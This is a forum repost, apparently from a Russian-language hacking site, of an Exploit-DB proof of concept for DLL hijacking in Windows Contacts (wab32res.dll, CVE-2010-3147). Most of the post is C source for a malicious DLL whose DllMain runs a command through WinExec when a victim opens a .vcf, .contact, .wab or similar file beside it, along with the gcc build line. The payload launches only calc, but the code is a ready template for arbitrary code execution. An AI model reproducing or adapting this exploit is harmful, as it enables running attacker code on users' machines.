Exploit Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14778
Проверка EDB
  1. Пройдено
Автор
STORM
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
cve-2010-3147 cve-2010-3143
Дата публикации
2010-08-25
C:
/*

Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm ([email protected])
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.

*/

#include <windows.h>

int hax()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  hax();
  return 0;
}
 
Источник
www.exploit-db.com

Похожие темы